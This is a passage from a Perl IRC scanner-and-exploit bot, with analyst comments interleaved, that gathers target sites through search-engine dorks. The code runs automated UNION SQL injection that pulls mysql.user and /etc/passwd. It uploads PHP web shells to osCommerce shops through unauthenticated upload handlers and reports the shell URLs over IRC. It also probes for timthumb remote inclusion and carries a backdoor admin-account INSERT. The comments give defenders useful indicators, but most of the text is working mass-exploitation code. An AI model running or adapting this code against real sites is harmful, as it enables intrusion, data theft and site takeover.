  971. elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
  972. &msg("$chan","$sqllogo(4@8$engine15)15(4@9MsSQL15)13 ".$vuln);}
  973. elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
  974. &msg("$chan","$sqllogo(4@8$engine15)15(4@9MsAccess15)13 ".$vuln);}
  975. elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
  976. &sqlbrute($sqlsite,$chan,$engine);}
  977. } exit; sleep(2); }
  978. }
  979. }
  980. }
  # sqlbrute: UNION-based column-count probe against $situs (analysis notes).
  # Args: base URL, IRC channel, engine label.
  # Tries 1..20 columns; each request appends
  #   -1+union+select+0x6c6f67696e70776e7a[,0x6c6f67696e70776e7a...]--
  # and looks for "loginpwnz" (the decoded hex marker) in the response.
  # After a hit it repeats the query against information_schema.tables and
  # mysql.user, tries load_file(0x2f6574632f706173737764) (hex for
  # /etc/passwd, checked via "root:x:"), then walks @tabele and calls
  # tabelka(). @tabele is not defined in this part of the file.
  # WAF/IDS signatures: "union+select+0x6c6f67696e70776e7a" and
  # "load_file(0x2f6574632f706173737764)" in the query string.
  # $union, $inyection, $sql, $response, $loadfile, $loadcont and $column are
  # used without "my", i.e. as package variables.
  # Requests go through get() (LWP::Simple, imported at the top of the file);
  # a failed get() after the first hit calls die.
  981. sub sqlbrute() {
  982. my $situs=$_[0];
  983. my $chan =$_[1];
  984. my $engine=$_[2];
  985. my $columns=20;
  986. my $cfin.="--";
  987. my $cmn.= "+";
  988. for ($column = 0 ; $column < $columns ; $column ++)
  989. {
  990. $union.=','.$column;
  991. $inyection.=','."0x6c6f67696e70776e7a";
  # First iteration resets both accumulators.
  992. if ($column == 0)
  993. {
  994. $inyection = '';
  995. $union = '';
  996. }
  997. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cfin;
  998. $response=get($sql);
  # Marker reflected in the page: this column count is accepted.
  999. if($response =~ /loginpwnz/)
  1000. {
  1001. $column ++;
  1002. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
  1003. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)13 $sql ");
  1004. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
  1005. $response=get($sql)or die("[-] Impossible to get Information_Schema\n");
  1006. if($response =~ /loginpwnz/)
  1007. {
  1008. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."information_schema.tables".$cfin;
  1009. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13INFO_SCHEMA15)13 $sql ");
  1010. }
  1011. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn."mysql.user".$cfin;
  1012. $response=get($sql)or die("[-] Impossible to get MySQL.User\n");
  1013. if($response =~ /loginpwnz/)
  1014. {
  1015. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn."mysql.user".$cfin;
  1016. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13USER15)13 $sql ");
  1017. }
  1018. else
  1019. {
  1020. }
  # Builds one load_file() term per remaining column.
  1021. while ($loadcont < $column-1)
  1022. {
  1023. $loadfile.=','.'load_file(0x2f6574632f706173737764)';
  1024. $loadcont++;
  1025. }
  1026. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
  1027. $response=get($sql)or die("[-] Impossible to inject LOAD_FILE\n");
  1028. if($response =~ /root:x:/)
  1029. {
  1030. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13Load File15)13 $sql ");
  1031. }
  1032. else
  1033. {
  1034. }
  # Table-name guessing from the @tabele list.
  1035. foreach $tabla(@tabele)
  1036. {
  1037. chomp($tabla);
  1038. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1039. $response=get($sql)or die("[-] Impossible to get tables\n");
  1040. if($response =~ /loginpwnz/)
  1041. {
  1042. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".$cmn.$tabla.$cfin;
  1043. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13Tabel15)13 $sql ");
  1044. &tabelka($situs,$tabla,$chan,$engine);
  1045. }
  1046. }
  1047. }
  1048. }
  1049. }
  1050.  
  # tabelka: column-name guessing for one table found by sqlbrute().
  # Args: base URL, table name, IRC channel, engine label.
  # For each entry of @kolumny (not defined in this part of the file) it
  # requests a UNION SELECT of concat(0x6c6f67696e70776e7a,0x3a,<column>)
  # from the table and reports to the channel when "loginpwnz" is reflected.
  # $inyection is the package variable left behind by sqlbrute().
  # A failed get() calls die.
  1051. sub tabelka() {
  1052. my $situs =$_[0];
  1053. my $tabla =$_[1];
  1054. my $chan =$_[2];
  1055. my $engine=$_[3];
  1056. my $cfin.="--";
  1057. my $cmn.= "+";
  1058. chomp($tabla);
  1059. foreach $columna(@kolumny)
  1060. {
  1061. chomp($columna);
  1062. $sql=$situs."-1".$cmn."union".$cmn."select".$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.$tabla.$cfin;
  1063. $response=get($sql)or die("[-] Impossible to get columns\n");
  1064. if ($response =~ /loginpwnz/)
  1065. {
  1066. &msg("$chan","$sqllogo(4@8$engine15)15(4@9SQL15)(4@13SQLi Vuln15)9 $situs 14(4@13Kolom14)13 $columna 14(4@13Tabel14)13 $tabla ");
  1067. }
  1068. }
  1069.  
  1070. }
  1071.  
  # osco: scan routine keyed on the response text "Warning: No file uploaded".
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # Each host from search_engine() is requested at host+$bug; a detached
  # grandchild (double fork) then calls osco_xpl() when the warning text is
  # present. Seeing that warning on an unauthenticated GET means the upload
  # handler is reachable without a session, which is the condition to fix.
  1072. sub osco() {
  1073. my $chan = $_[0];
  1074. my $bug = $_[1];
  1075. my $dork = $_[2];
  1076. my $engine = $_[3];
  1077. my $count = 0;
  1078. my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  1079. my $num = scalar(@list);
  1080. if ($num > 0) {
  1081. foreach my $site (@list) {
  1082. $count++;
  1083. if ($count == $num-1) { &msg("$chan","$oscologo(4@8$engine15)10 Scan finish"); }
  1084. my $test = "http://".$site.$bug;
  1085. my $html = &get_content($test);
  1086. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1087. if ($html =~ /Warning: No file uploaded/ ) {
  1088. # &msg("$chan","$oscologo(4@8$engine15)15(4@9System15)7 ".$test);
  1089. &osco_xpl($test,$chan,$site,$engine);
  1090. } else { }
  1091. } exit; sleep(2); }
  1092. }
  1093. }
  1094. }
  1095.  
  # osco_xpl: follow-up for a host flagged by osco().
  # Args: upload URL, IRC channel, host, engine label.
  # Sends four POSTs with the form field "products_image", uploading the
  # bot's local files ./ipays.jpg, ./maza.jpg, ./byroe.jpg and ./allnet.jpg
  # under the names bronsx.php, aspaltx.php, byroe.php and allnet.html.
  # The four responses are stringified ($hasil..$hasil3) but not inspected.
  # It then requests images/aspaltx.php, images/byroe.php and
  # images/allnet.html and checks the first for "JANCOK- exploit".
  # Hunting: those file names under the shop's images/ directory; hardening:
  # the images directory should not execute PHP.
  1096. sub osco_xpl() {
  1097. my $browser = LWP::UserAgent->new;
  1098. my $url = $_[0];
  1099. my $chan = $_[1];
  1100. my $site = $_[2];
  1101. my $engine = $_[3];
  1102. my $res = $browser->post( $url,['products_image' => ['./ipays.jpg' => 'bronsx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1103. my $resa = $browser->post( $url,['products_image' => ['./maza.jpg' => 'aspaltx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1104. my $resb = $browser->post( $url,['products_image' => ['./byroe.jpg' => 'byroe.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1105. my $resc = $browser->post( $url,['products_image' => ['./allnet.jpg' => 'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1106. my $hasil = $res->as_string;
  1107. my $hasil1 = $resa->as_string;
  1108. my $hasil2 = $resb->as_string;
  1109. my $hasil3 = $resc->as_string;
  1110. my $check = &get_content("http://".$site."images/aspaltx.php");&get_content("http://".$site."images/byroe.php");&get_content("http://".$site."images/allnet.html");sleep(3);
  1111. if ($check =~ /JANCOK- exploit/) {
  1112. my $safe ="";
  1113. my $os ="";
  1114. my $free ="";
  # $soft is a package variable (no "my") and is not used in the messages.
  1115. if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  1116. if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
  1117. if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  1118. if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  1119. &msg("$chan","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4aspaltx.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
  1120. &msg("$admin","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4allnet.html 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
  1121. }
  1122. }
  1123.  
  # osco2: second scan routine for the same family as osco(), keyed on the
  # response text "TABLE_HEADING_FILENAME".
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # Hosts whose host+$bug page contains that string are handed to
  # osco_xpl2() from a detached grandchild (double fork).
  1124. sub osco2() {
  1125. my $chan = $_[0];
  1126. my $bug = $_[1];
  1127. my $dork = $_[2];
  1128. my $engine = $_[3];
  1129. my $count = 0;
  1130. my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
  1131. my $num = scalar(@list);
  1132. if ($num > 0) {
  1133. foreach my $site (@list) {
  1134. $count++;
  1135. if ($count == $num-1) { &msg("$chan","$oscologo(4@8$engine15)10 Scan finish"); }
  1136. my $test = "http://".$site.$bug;
  1137. my $html = &get_content($test);
  1138. if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
  1139. if ($html =~ /TABLE_HEADING_FILENAME/ ) {
  1140. # &msg("$chan","$oscologo(4@8$engine15)15(4@9System15)7 ".$test);
  1141. &osco_xpl2($test,$chan,$site,$engine);
  1142. } else { }
  1143. } exit; sleep(2); }
  1144. }
  1145. }
  1146. }
  1147.  
  # osco_xpl2: follow-up for a host flagged by osco2().
  # Args: page URL, IRC channel, host, engine label.
  # Appends "?action=processuploads" to the URL and sends four POSTs with the
  # form field "file_1", uploading ./ipays.jpg, ./maza.jpg, ./byroe.jpg and
  # ./allnet.jpg under the names bronsx.php, aspaltx.php, byroe.php and
  # allnet.html. The responses are stringified but not inspected.
  # It then requests images/aspaltx.php, images/byroe.php and
  # images/allnet.html and tests the first response against a marker string.
  # Log signature: unauthenticated POSTs to "...?action=processuploads".
  1148. sub osco_xpl2() {
  1149. my $browser = LWP::UserAgent->new;
  1150. my $url = $_[0]."?action=processuploads";
  1151. my $chan = $_[1];
  1152. my $site = $_[2];
  1153. my $engine = $_[3];
  1154. my $res = $browser->post( $url,['file_1' => ['./ipays.jpg' => 'bronsx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1155. my $resa = $browser->post( $url,['file_1' => ['./maza.jpg' => 'aspaltx.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1156. my $resb = $browser->post( $url,['file_1' => ['./byroe.jpg' => 'byroe.php' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1157. my $resc = $browser->post( $url,['file_1' => ['./allnet.jpg' => 'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');
  1158. my $hasil = $res->as_string;
  1159. my $hasil1 = $resa->as_string;
  1160. my $hasil2 = $resb->as_string;
  1161. my $hasil3 = $resc->as_string;
  1162. my $check = &get_content("http://".$site."images/aspaltx.php");&get_content("http://".$site."images/byroe.php");&get_content("http://".$site."images/allnet.html");sleep(3);
  1163. if ($check =~ /JANCOK- exploits/) {
  1164. my $safe ="";
  1165. my $os ="";
  1166. my $free ="";
  1167. if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
  1168. if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
  1169. if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
  1170. if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
  1171. &msg("$chan","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4aspaltx.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
  1172. &msg("$admin","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4allnet.html 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
  1173. }
  1174. }
  1175.  
  # loko: reporting-only scan for an exposed file-manager page.
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # Requests host + "filemanager/browser.html" for each host and reports to
  # the channel when the body matches $loko_output (a pattern defined
  # outside this part of the file). No upload is attempted in this sub.
  # $bug is passed to search_engine() but is not part of the URL requested.
  1176. sub loko() {
  1177. my $chan = $_[0];
  1178. my $bug = $_[1];
  1179. my $dork = $_[2];
  1180. my $engine = $_[3];
  1181. my $count = 0;
  1182. my @list = &search_engine($chan,$bug,$dork,$engine,$lokologo);
  1183. my $num = scalar(@list);
  1184. if ($num > 0) {
  1185. foreach my $site (@list) {
  1186. $count++;
  1187. if ($count == $num-1) { &msg("$chan","$lokologo(4@8$engine15)10 Scan finish"); }
  1188. my $test = "http://".$site."filemanager/browser.html";
  1189. my $vuln = "http://".$site."filemanager/browser.html";
  1190. my $re = &get_content($test);
  1191. if ($re =~ /$loko_output/){
  1192. &msg("$chan", "$lokologo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
  1193. }
  1194. }
  1195. }
  1196. }
  1197.  
  # op: reporting-only scan for an exposed FCKeditor connector test page.
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # Requests host + $open_test and reports to the channel when the body
  # matches $open_output; both variables are defined outside this part of
  # the file. The URL reported is
  # admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html.
  # Hardening: that test page and the connectors directory should not be
  # reachable on a production site.
  1198. sub op() {
  1199. my $chan = $_[0];
  1200. my $bug = $_[1];
  1201. my $dork = $_[2];
  1202. my $engine = $_[3];
  1203. my $count = 0;
  1204. my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
  1205. my $num = scalar(@list);
  1206. if ($num > 0) {
  1207. foreach my $site (@list) {
  1208. $count++;
  1209. if ($count == $num-1) { &msg("$chan","$oplogo(4@8$engine15)10 Scan finish"); }
  1210. my $test = "http://".$site.$open_test;
  1211. my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
  1212. my $re = &get_content($test);
  1213. if ($re =~ /$open_output/){
  1214. &msg("$chan", "$oplogo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
  1215. }
  1216. }
  1217. }
  1218. }
  1219.  
  # zen: scan routine that only checks for an already-planted file.
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # $test (a password_forgotten.php URL) and $que (an INSERT into the admin
  # table) are built but never sent by this sub; the only request made is
  # for $vuln, which is reported when the body contains "JANCOK- exploit".
  # Indicators present in the unused values: admin_name 'adminsys' and
  # admin_email 'admin@mazacrew.co.cc' - worth searching for in a shop's
  # admin table, since other parts of the kit may use the same query.
  1220. sub zen() {
  1221. my $chan = $_[0];
  1222. my $bug = $_[1];
  1223. my $dork = $_[2];
  1224. my $engine = $_[3];
  1225. my $count = 0;
  1226. my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
  1227. my $num = scalar(@list);
  1228. if ($num > 0) {
  1229. foreach my $site (@list) {
  1230. $count++;
  1231. if ($count == $num-1) { &msg("$chan","$zenlogo(4@8$engine15)10 Scan finish"); }
  1232. my $test = "http://".$site."admin/record_company.php/password_forgotten.php?action=insert";
  1233. my $vuln = "http://".$site."images/4brons.php";
  1234. my $que = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56,'adminsys','admin@mazacrew.co.cc','617ec22fbb8f201c366e9848c0eb6925:87');";
  1235. my $re = &get_content($vuln);
  1236. if ($re =~ /JANCOK- exploit/i){
  1237. &msg("$chan", "$zenlogo(4@8$engine15)(4@13Shell15)13 ".$vuln."");
  1238. }
  1239. else{
  1240. # &msg("$chan", "$zenlogo(4@8$engine15)(4@13GaGaL15)4 ".$vuln."15(4@9Ab0rteD15)");
  1241. }
  1242. }
  1243. }
  1244. }
  1245.  
  1246. ######################################### ADDED
  1247.  
  # thumb: scan routine for timthumb.php remote-source fetching.
  # Args: IRC channel, URL path suffix ($bug), search dork, engine label.
  # Requests host+$bug+"timthumb.php?src="+$thumbshell ($thumbshell is
  # defined outside this part of the file), then two paths ending in
  # cache/c54af1d13e884a4c63da8f3098a7a4da.php and
  # temp/c54af1d13e884a4c63da8f3098a7a4da.php.
  # Only the first response is examined, for the text "tripl3k was Here";
  # $loco1 and $loco2 are fetched but not checked.
  # Hunting: a file named c54af1d13e884a4c63da8f3098a7a4da.php in a
  # timthumb cache/ or temp/ directory, and "timthumb.php?src=http" requests
  # whose src host is not on the site's allow-list.
  1248. sub thumb() {
  1249. my $chan = $_[0];
  1250. my $bug = $_[1];
  1251. my $dork = $_[2];
  1252. my $engine = $_[3];
  1253. my $count = 0;
  1254. my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
  1255. my $num = scalar(@list);
  1256. if ($num > 0) {
  1257. foreach my $site (@list) {
  1258. $count++;
  1259. if ($count == $num-1) { &msg("$chan","$thumblogo(4@9$engine15)10 Scan finish"); }
  1260. my $coba = "http://".$site.$bug."timthumb.php?src=".$thumbshell."";
  1261. my $cek = &get_content($coba);sleep(1);
  1262. my $aa = "cache/c54af1d13e884a4c63da8f3098a7a4da.php";
  1263. my $ab = "temp/c54af1d13e884a4c63da8f3098a7a4da.php";
  1264. my $ceck1 = "http://".$site.$bug.".$aa";
  1265. my $ceck2 = "http://".$site.$bug.".$ab";
  1266. my $loco1 = &get_content($ceck1);sleep(1);
  1267. my $loco2 = &get_content($ceck2);sleep(1);
  1268. if ($cek =~ /tripl3k was Here/i) {
  1269. my $vuln = "http://".$site.$bug."cache/c54af1d13e884a4c63da8f3098a7a4da.php";
  1270. &msg("$chan", "$thumblogo(4@8$engine15)(4@4VulN15)4 ".$vuln." 15(4@9 0WN3D 15)");
  1271. }
  1272. }
  1273. }
  1274. }
  1275.  
  1276.  
  1277.  
  1278. #########################################
  1279.  
  # search_engine: dispatcher from an engine label to its scraper sub.
  # Args: IRC channel, $bug (unused here), search dork, engine label, logo.
  # The label is compared with "eq" against 32 fixed strings; the matching
  # scraper is called with the dork and its results are collected in @total.
  # @total is then passed through clean() (defined elsewhere in the file),
  # the Total/Clean counts are posted to the channel, and the cleaned list
  # is returned to the calling scan routine.
  1280. sub search_engine() {
  1281. my (@total,@clean);
  1282. my $chan = $_[0];
  1283. my $bug = $_[1];
  1284. my $dork = $_[2];
  1285. my $engine = $_[3];
  1286. my $logo = $_[4];
  1287. if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
  1288. if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }
  1289. if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
  1290. if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork); push(@total,@altavista); }
  1291. if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
  1292. if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
  1293. if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
  1294. if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }
  1295. if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }
  1296. if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }
  1297. if ($engine eq "ExaLead") { my @exalead = &exalead($dork); push(@total,@exalead); }
  1298. if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
  1299. if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }
  1300. if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }
  1301. if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
  1302. if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
  1303. if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
  1304. if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }
  1305. if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }
  1306. if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }
  1307. if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }
  1308. if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }
  1309. if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }
  1310. if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }
  1311. if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
  1312. if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }
  1313. if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
  1314. if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }
  1315. if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }
  1316. if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }
  1317. if ($engine eq "TisCali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }
  1318. if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }
  1319. @clean = &clean(@total);
  1320. &msg("$chan","$logo(4@8$engine15)4 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).")");
  1321. return @clean;
  1322. }
  1323.  
  1324. #########################################
  1325.  
  # isFound: fetch $link with get_content() and return 1 if the body matches
  # the pattern in $reqexp, else 0. The pattern is interpolated into the
  # regex as-is (no quoting).
  1326. sub isFound() {
  1327. my $status = 0;
  1328. my $link = $_[0];
  1329. my $reqexp = $_[1];
  1330. my $res = &get_content($link);
  1331. if ($res =~ /$reqexp/) { $status = 1 }
  1332. return $status;
  1333. }
  1334.  
  # get_content: single GET of $url with a 7-second timeout; returns the
  # response body whatever the HTTP status (the status is not checked).
  # The User-Agent comes from $uagent, which is defined outside this part of
  # the file; its value is the header to look for in logs for every plain
  # probe the scan routines make.
  1335. sub get_content() {
  1336. my $url = $_[0];
  1337. my $ua = LWP::UserAgent->new(agent => $uagent);
  1338. $ua->timeout(7);
  1339. my $req = HTTP::Request->new(GET => $url);
  1340. my $res = $ua->request($req);
  1341. return $res->content;
  1342. }
  1343.  
  1344. ######################################### SEARCH ENGINE gibla
  1345.  
  # google: result scraper. Arg: search dork. Returns a list built by links().
  # Requests www.google.com/search with start=0,10,...,400 (num=100,
  # filter=0), pulls every href="http://<host>/ from the HTML, skips hosts
  # containing "google", and passes each remaining host to links().
  # key(), search_engine_query() and links() are defined elsewhere in the file.
  1346. sub google() {
  1347. my @list;
  1348. my $key = $_[0];
  1349. for (my $i=0; $i<=400; $i+=10){
  1350. my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
  1351. my $res = &search_engine_query($search);
  1352. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
  1353. if ($1 !~ /google/){
  1354. my $link = $1;
  1355. my @grep = &links($link);
  1356. push(@list,@grep);
  1357. }
  1358. }
  1359. }
  1360. return @list;
  1361. }
  1362.  
  # rediff: result scraper for search1.rediff.com. Arg: search dork.
  # Pages with firstres=0,10,...,500 and stops early (by setting $i to 500)
  # when the response has no "firstres=<current offset>'>" link.
  # Hosts matching rediff.com are skipped; the rest go through links().
  # $b is assigned without "my", i.e. the package variable $b.
  1363. sub rediff() {
  1364. my @list;
  1365. my $key = $_[0];
  1366. for (my $i=0; $i<=500; $i+=10) {
  1367. my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
  1368. $b = "$i";
  1369. my $res = &search_engine_query($search);
  1370. if ($res !~ /firstres=$b\'>/) {$i=500;}
  1371. while ($res =~ m/<a href=\"http:\/\/(.*?)\" onmousedown/g) {
  1372. if ($1 !~ /rediff\.com/){
  1373. my $link = $1;
  1374. my @grep = &links($link);
  1375. push(@list,@grep);
  1376. }
  1377. }
  1378. }
  1379. return @list;
  1380. }
  1381.  
  # uol: result scraper for mundo.busca.uol.com.br. Arg: search dork.
  # Pages with start=1,11,...; stops early when the "next" span is absent
  # from the response. Hosts matching uol.com are skipped; the rest go
  # through links().
  1382. sub uol() {
  1383. my @list;
  1384. my $key = $_[0];
  1385. for (my $i=1; $i<=500; $i+=10) {
  1386. my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);
  1387. my $res = &search_engine_query($search);
  1388. if ($res !~ m/<span class=\"next\">pr&#243;xima<\/span>/){$i=500;}
  1389. while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
  1390. if ($1 !~ /uol\.com/) {
  1391. my $link = $1;
  1392. my @grep = &links($link);
  1393. push(@list,@grep);
  1394. }
  1395. }
  1396. }
  1397. return @list;
  1398. }
  1399.  
  # bing: result scraper for www.bing.com. Arg: search dork.
  # Pages with first=1,11,... (filt=all, FORM=PERE); stops early when the
  # response contains "Ref A:", "Ref B:" and "Ref C:" together.
  # Hosts matching bing.com are skipped; the rest go through links().
  1400. sub bing() {
  1401. my @list;
  1402. my $key = $_[0];
  1403. for (my $i=1; $i<=500; $i+=10) {
  1404. my $search = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");
  1405. my $res = &search_engine_query($search);
  1406. if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}
  1407. while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
  1408. if ($1 !~ /bing\.com/) {
  1409. my $link = $1;
  1410. my @grep = &links($link);
  1411. push(@list,@grep);
  1412. }
  1413. }
  1414. }
  1415. return @list;
  1416. }
  1417.  
  # altavista: result scraper for it.altavista.com. Arg: search dork.
  # Pages with stq=1,11,...; stops early when the response has no
  # target="_self">Succ link. Hosts are taken from <span class=ngrn> text up
  # to the first "/", with "<" and spaces stripped; entries containing
  # "altavista" are skipped and the rest go through links().
  1418. sub altavista() {
  1419. my @list;
  1420. my $key = $_[0];
  1421. for (my $i=1; $i<=500; $i+=10){
  1422. my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);
  1423. my $res = &search_engine_query($search);
  1424. if ($res !~ /target=\"_self\">Succ/) {$i=500;}
  1425. while ($res =~ m/<span class=ngrn>(.+?)\//g) {
  1426. if ($1 !~ /altavista/){
  1427. my $link = $1;
  1428. $link =~ s/<//g;
  1429. $link =~ s/ //g;
  1430. my @grep = &links($link);
  1431. push(@list,@grep);
  1432. }
  1433. }
  1434. }
  1435. return @list;
  1436. }
  1437.  
  # ask: result scraper for it.ask.com. Arg: search dork.
  # Pages with page=1..50 and a fixed qid value; stops early when the
  # response does not contain "Successiva". Hosts matching ask.com are
  # skipped; the rest go through links().
  1438. sub ask() {
  1439. my @list;
  1440. my $key = $_[0];
  1441. for (my $i=1; $i<=50; $i+=1) {
  1442. my $search = ("http://it.ask.com/web?q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
  1443. my $res = &search_engine_query($search);
  1444. if ($res !~ /Successiva/) {$i=50;}
  1445. while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
  1446. if ($1 !~ /ask\.com/){
  1447. my $link = $1;
  1448. my @grep = &links($link);
  1449. push(@list,@grep);
  1450. }
  1451. }
  1452. }
  1453. return @list;
  1454. }
  1455.  
  # yahoo: result scraper for search.yahoo.com. Arg: search dork.
  # Pages with b=1,11,...,491 with no early-stop check. Hosts are taken from
  # URL-encoded "http%3a//" strings in the response; entries matching
  # yahoo.com are skipped and the rest go through links().
  1456. sub yahoo(){
  1457. my @list;
  1458. my $key = $_[0];
  1459. my $b = 0;
  1460. for ($b=1; $b<=500; $b+=10) {
  1461. my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);
  1462. my $res = &search_engine_query($search);
  1463. while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
  1464. if ($1 !~ /yahoo\.com/){
  1465. my $link = $1;
  1466. my @grep = &links($link);
  1467. push(@list,@grep);
  1468. }
  1469. }
  1470. }
  1471. return @list;
  1472. }
  1473.  
  # clusty: result scraper for search.yippy.com. Arg: search dork.
